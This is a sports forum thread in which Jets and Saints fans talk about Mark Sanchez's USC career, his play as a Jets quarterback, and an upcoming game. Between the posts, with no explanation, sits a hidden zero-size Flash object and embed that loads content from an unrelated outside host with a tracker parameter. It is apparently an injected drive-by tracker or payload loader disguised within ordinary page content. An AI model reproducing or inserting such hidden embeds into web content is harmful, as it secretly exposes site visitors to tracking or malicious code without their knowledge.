Hey Guys!! (1 Viewer)

I was PO'd when they took Sanchez as I wasn't impressed with his time at SC. I was clearly wrong about him..and am happy to admit it. We haven't had a legit signal caller since Broadway Joe himself.

Other than his knee injuries, what were your critcisms/critiques of Sanches at USC?

I hope Sanchez works out for you guys in the long run, it is great to have someone like Brees behind center. I really believe that we will come out on top right now, we are on fiya and I know the jets are too, but the jets offense hasn;t shown me much tbh except on some short fields. Best of luck and hopefully no injuries, I see us putting up 40 hope you guys can keep it close :)

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4730"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4730" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>I just didn't think he was ready to come out yet..just as his coach didn't. Most SC QB's turn out to be horrible pros too...minus Palmer (pre-injury).

I didnt either, but the guy is playing well. Good luck to him, just not this week

I just didn't think he was ready to come out yet..just as his coach didn't. Most SC QB's turn out to be horrible pros too...minus Palmer (pre-injury).

I hear you. USC QBs definitely have a unique situation, playing on such a loaded team and receiving such media adulation. Something about Sanchez' enthusiasm and obvious love of the game seemed to make him more human and less aloof though to me. Anyways, I'm happy for y'all that you finally got a QB.

I hope Sanchez works out for you guys in the long run, it is great to have someone like Brees behind center. I really believe that we will come out on top right now, we are on fiya and I know the jets are too, but the jets offense hasn;t shown me much tbh except on some short fields. Best of luck and hopefully no injuries, I see us putting up 40 hope you guys can keep it close :)

Bingo..the Jets have capatalized on field position..and that's about it.

I hear you. USC QBs definitely have a unique situation, playing on such a loaded team and receiving such media adulation. Something about Sanchez' enthusiasm and obvious love of the game seemed to make him more human and less aloof though to me. Anyways, I'm happy for y'all that you finally got a QB.

What I like about Sanchez is he LOVES being a Jet.

He was pumped on Draft Day when he was drafted..signed his contract quick to get to work..and represents the organization well. Couldn't have asked for anything more..

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Already have an account? Log in here.

Users who are viewing this thread

Back
    Top Bottom